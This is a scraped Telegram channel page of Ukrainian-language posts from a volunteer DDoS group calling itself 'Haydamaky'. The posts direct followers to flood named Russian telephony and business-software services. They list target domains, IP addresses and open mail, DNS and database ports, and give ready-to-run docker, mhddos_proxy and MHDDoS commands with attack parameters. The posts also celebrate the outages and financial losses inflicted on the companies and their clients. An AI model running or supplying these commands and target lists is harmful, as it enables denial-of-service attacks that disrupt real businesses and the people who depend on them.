Гайдамаки InfoDDoS-3
Mostrar más
El país no está especificadoEl idioma no está especificadoLa categoría no está especificada
273Suscriptores
Sin datos24 hours
Sin datos7 days
Sin datos30 days
- Suscriptores
- Cobertura postal
- ER - ratio de compromiso
Carga de datos en curso...
Tasa de crecimiento de suscriptores
Carga de datos en curso...
Доброго дня, Гайдамаки!
Ми вирішили, що ці 4 канали не потрібні, тому через кілька днів їх буде видалено..😓
Причина проста: всі цілі і пости просто дублюються сюди, виникає питання — чому б вам не брати таргети на пряму з основного каналу? Ось і ми так подумали, тому всім активним учасникам прошу перейти на основний канал, лінк нижче:
https://t.me/haydamaki
Люблю, цілую — головний адмін❤️
Гайдамаки
Discord Гайдамак:
https://discord.gg/UyqBRprgZtЧат Гайдамак:
https://t.me/haydamaki_chatДокументація DDoS:
https://t.me/haydamaki/14Зв'язок з адмінами: @haydamak_bot
Доброго вечора, Гайдамаки!
Продовжуємо атакувати Фретен біржу. Сервіс працює, але з перебоями. Іноді буває, що ддос гуард вічно грузиться, але ніяк не прогрузиться, іноді сайт з'являється, але без CSS... Коротко кажучи, ми молодці, атаку не зупиняємо, результати дуже хороші😁
Також зараз не рекомендую ігнорувати тривоги, кацапи бушують...😓 І не розповсюджуйте інформацію "шо де в кого бахнуло", я звертаюся до всіх вас, так як ви перебуваєте в багатьох чатах, і навіювати паніку не потрібно.
Доброї ночі, гайдамаки!😴
Атака на флоулу була не дуже вдалою, так як там працють люди, які реально розбираються у своїй справі. Порти постійно фільтрували, але "елегантно" — вони відкриті, зі статусом tcpwrapped😓
На ніч, я вирішив дати не великий сервіс, так як вночі зазвичай активу мало — Вотбокс. Це телефонія, яка дає декільком компаніям свої віртуальні апі і звязок через систему CRM.
api.votbox.ru
www.votbox.ru
votbox.ru
www.virtualofficetools.ru
virtualofficetools.ru
telefononline.ru
84.52.103.122
[80/TCP, 443/TCP]
[25/STMPd, 110/POP3d, 143/IMAPd, 993/ssl-IMAPd, 995ssl-POP3d] —> поштові канали звязку*
mx.virtualofficetools.ru
mx.votbox.ru
84.52.103.120
[443/TCP]
31.177.80.41
89.111.166.6
[53/UDP] —> DNS-servers
Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest http://www.votbox.ru http://www.votbox.ru/cloff.html http://www.votbox.ru/cloffback.html http://telefononline.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table
Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py http://www.votbox.ru http://www.votbox.ru/cloff.html http://www.votbox.ru/cloffback.html http://telefononline.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table
Команди для MHDDoS:
python3 start.py UDP 31.177.80.41:53 5000 10000 true
python3 start.py UDP 89.111.166.6:53 5000 10000 true
python3 start.py STRESS http://www.votbox.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://www.votbox.ru/cloff.html 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://www.votbox.ru/cloffback.html 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://telefononline.ru 6 1000 proxy.txt 10000 5000 true
Всі ми стомились останнім часом.. Війна все "попаскудила" всім, але не час здаватись, потрібно показати оркам, що вони зробили велику помилку👊Update: 11:07 —> тимчасово використовуємо старі команди, прописані вручну — статичні команди для атак накрились**
Доброго ранку, Гайдамаки!⚔️
Сьогодні атакуємо вже сервіси Фловлу. Це сервіс-органайзер для бізнес планування. Він складається з різних "боксів", які виконують певні функції — синхронізація заміток, канали пошти, синзронізація з різними онлайн-гаманцями, планування подій, архіви для файлів і ще багато різних ніштяків😏
Важливі порти для атаки — поштові. Як я вже казав в попередньому пості: "Також, хочу сказати, що ми доволі потужно атакували їх поштові канали звязку через порти 25, 110, 145, 993, 995, тобто через в основному протоколи STMP і POP3. Такі атаки є важкими для відновлення ворогу, тому завтра спробуємо повторити досвід"
flowlu.ru
www.flowlu.ru
178.170.244.102
[21/TCP, 22/TCP, 80/TCP]
[25/TCP, 110/TCP, 143/TCP, 465/TCP, 587/TCP, 993/TCP, 995/TCP] —> Dovecot mail-ports (поштові канали звязку)*
mx.flowlu.ru
95.213.248.77 —> висить їх БД
[22/TCP, 3306/TCP, 9100/TCP, 9998/TCP]
legal.flowlu.ru
complitech.flowlu.ru
artgorka.flowlu.ru
acorn.flowlu.ru
labx.flowlu.ru
hc.flowlu.ru
flamingo.flowlu.ru
ironplastgroup.flowlu.ru
relgroup.flowlu.ru
ginoice.flowlu.ru
ronavi.flowlu.ru
pipe.flowlu.ru
my.flowlu.ru
trustyhost.flowlu.ru
37.200.70.155
[22/TCP, 25/TCP]
DNS-servers:
ns1 —> 31.177.80.41 [53/UDP]
ns2 —> 89.111.166.6 [53/UDP]
Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://flowlu.ru https://my.flowlu.ru/register https://flowlu.ru/services/tasks/ https://flowlu.ru/prices/ https://flowlu.ru/blog/ http://178.170.244.102/phpmyadmin/ -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py https://flowlu.ru https://my.flowlu.ru/register https://flowlu.ru/services/tasks/ https://flowlu.ru/prices/ https://flowlu.ru/blog/ http://178.170.244.102/phpmyadmin/ -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --table
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
Команди для MHDDoS:
python3 start.py UDP 31.177.80.41:53 5000 10000 true
python3 start.py UDP 89.111.166.6:53 5000 10000 true
python3 start.py POST 95.213.248.77:3306 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.213.248.77:9100 6 1000 proxy.txt 10000 10000 true
python3 start.py POST 95.213.248.77:9998 6 1000 proxy.txt 10000 10000 true
python3 start.py STRESS https://flowlu.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://my.flowlu.ru/register 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/services/tasks/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/prices/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://flowlu.ru/blog/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS http://178.170.244.102/phpmyadmin/ 6 1000 proxy.txt 10000 5000 true
Сервіс доволі вразливий, одразу видно, що його не атакували взагалі. Що ж, потрібно виправляти😊Доброї ночі, Гайдамаки і Гайдамачки!😁
Вітаємо з Великоднем! Сподіваюсь, що сьогодні ви добре відпочили, так як таргетів не було — рахуйте, що це аванс, так як відпочивати під час війни ми можемо рідко😴
Минула наша атака на сервіси Неофона не була марною. Зараз вони вже стали на ноги, хоча сервіс пів доби лежав мінімум і багато бізнес компаній не мали до нього доступу=втрата грошей. Також, хочу сказати, що ми доволі потужно атакували їх поштові канали звязку через порти 25, 110, 145, 993, 995, тобто через в основному протоколи STMP і POP3. Такі атаки є важкими для відновлення ворогу, тому завтра спробуємо повторити досвід.
Далі, буде атака на ще один сервіс з бізнес сектору рашистів, цього разу вже не зовсім телефонія. Ціль вразлива і доволі велика, тому будемо атакувати спільно з іншою ddos-групою😜
Збір о 10 ранку! ВАЖЛИВА ЦІЛЬ!
Доброго дня, Гайдамаки!😊
Продовжуємо завдавати удару ворогам на кіберфронті. Вчора ми змогли різким ударом повалити сайти Неофонс-телефонії. Молодці!❤️
Наша ціль на зараз — та ж сама, але, оскільки вони почали масово закривати порти на основних айпі, було проведено додаткову розвідку і виявлено кілька поштових айпі з відкритими портами.
Доповнюю основну ціль, результат тримайте нижче.
neophones.ru
neocomms.ru
www.neocomms.ru
www.neophones.ru
83.166.225.198 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)*
wiki.neophones.ru
217.150.199.10 —> поки що фільтрують + закривають порти, постійно слідкую за цією айпі. Не атакуємо. Може відкриють якісь порти, дам знати)*
MAIL-servers:
217.150.193.196
[110/TCP, 143/TCP, 993/TCP, 995/TCP]
83.166.225.200
[25/TCP]
DNS-servers:
217.150.192.194
217.150.193.194
[53/UDP] —> все ще відкриті, атаку по юдп не припиняємо*
Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table
Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py https://neophones.ru https://neophones.ru/utm5/connect_master https://neocomms.ru/payment https://neocomms.ru/contacts https://neophones.ru/tariffs -t 2400 --rpc 1500 -p 900 --http-methods STRESS POST --table
Команди для MHDDoS:
python3 start.py UDP 217.150.192.194:53 5000 10000 true
python3 start.py UDP 217.150.193.194:53 5000 10000 true
python3 start.py STRESS https://neophones.ru/utm5/connect_master 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neocomms.ru/payment 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neocomms.ru/contacts 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://neophones.ru/tariffs 6 1000 proxy.txt 10000 5000 true
Доброго дня, Гайдамаки!🤗
Останні кілька днів ми атакували сервіси войс-конект, і, скажу вам чесно, атака вийшла доволі потужна, тривалістю в кілька діб — це фатально для бізнесу. Зараз їх компанія перейшли на клауд іншої бізнес-компанії, але таку ціль ми вже не подужаємо. В будь-якому випадку це призвело до паніки всіх їх клієнтів і зараз вони понесли великі втрати. Що ж, тоді продовжуємо роботу над бізнес-сервісами окупантів. Потрібно зменшити спонсорування війни рашистів. А також давайте нагадаємо, що ми зробили за останні кілька тижнів😊
Перша хвиля атак Гайдамаків "Рейди на телефонії рашистів" — ТЕЛЕФІН:
Ми атакували Телефін. У цьому випадку, наслідками нашої атаки ворогом було витрачено доволі солідну суму грошей на QRATOR-захист. Цей тип захисту доволі ефективний, але також, одночасно з цим, — дууже дорогий😈
Друга хвиля атак Гайдамаків "Рейди на телефонії рашистів" — ГРАВІТЕЛ:
Гравітел. Тут ми знищили основні, а також додаткові сервіси телефонії. Сервери не працювали кілька днів. У них був вибір: або втрачати кошти, поки сервіс лежить, або поставити захист, так само, як Телефін. Вони обрали перший варіант.
Третя хвиля атак Гайдамаків "Рейди на телефонії рашистів" — КАРАТ:
Далі атака на Карат-телефонію та Інсайд-тел. Саме в цей момент ці компанії обєднувались в одну (інтеграція Інсайда в Карат), ми трішки завадили цьому👌
Четверта хвиля атак Гайдамаків "Рейди на телефонії рашистів" — ВОЙС-КОНЕКТ:
Найдовша атака була саме на сервіси Войс-конект — 5 днів. Чому так довго? В першу чергу нашим завданням було заставити їх зробити так само як Телефін, а саме витратити кругленьку суму на підтримку свого сервісу. Довго ми чекали, поки будуть хоч якісь дії.. І ось, сьогодні вони перенесли свою БД на клауд. На це вони теж витратили трішки грошенят.
Також була безрезультатна атака на Сбербанк (спільно з іншими групами), атака на аеропорт Іркутська, атака на росказну, ну і, звісно, доволі вдала атака Айті армії на системи маркування ЧЗ, в якій ми допомогли їм.
Але зараз основний акцент і вектор атак нашого угрупування — це бізнес сектор РФ! Чекайте вказівок. Ціль на ніч✨
Збір — 22.00!!!
Увага!!! Зараз прошу всіх максимально атакувати по UDP!
Знаю, ви стомились атакувати 2 день підряд один сервіс, але лише точковими ударами, ми можем реально мати вплив на економіку рашистів👌
www.voice-connect.ru
voice-connect.ru
my.voice-connect.ru
billing.voice-connect.ru
home.voice-connect.ru
185.248.100.60
[22/TCP, 25/TCP, 111/TCP, 443/TCP]
77.244.214.121
[22/TCP, 25/TCP, 443/TCP]
95.163.87.128
[22/TCP, 1720/TCP, 3306/TCP, 5060/TCP]
195.88.209.73
[22/TCP, 443/TCP, 8080/TCP]
91.217.20.20
194.67.73.81
91.217.21.20
89.104.95.35
193.232.146.1
[53/UDP]
Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
(прошу зараз атакувати саме командою вище)***
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://home.voice-connect.ru http://home.voice-connect.ru https://my.voice-connect.ru -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --tableКоманда для mhddos_proxy:
python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
(прошу зараз атакувати саме командою вище)***
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://home.voice-connect.ru http://home.voice-connect.ru https://my.voice-connect.ru -t 2500 --rpc 1500 -p 900 --http-methods STRESS POST --tableКоманди для MHDDoS:
python3 start.py UDP 91.217.20.20:53 5000 10000 true python3 start.py UDP 194.67.73.81:53 5000 10000 true python3 start.py UDP 91.217.21.20:53 5000 10000 true python3 start.py UDP 89.104.95.35:53 5000 10000 true python3 start.py UDP 193.232.146.1:53 5000 10000 true(вище пріорітетні зараз команди)***
python3 start.py POST 95.163.87.128:3306 6 1000 proxy.txt 10000 10000 true python3 start.py STRESS https://home.voice-connect.ru 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS http://home.voice-connect.ru 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://my.voice-connect.ru 6 1000 proxy.txt 10000 5000 trueПриходиться часто корегувати ціль, а це значить, що вони постійно стараються обходити наші атаки — тобто ми все правильно робимо, продовжуємо, поки не ляжуть повністю😉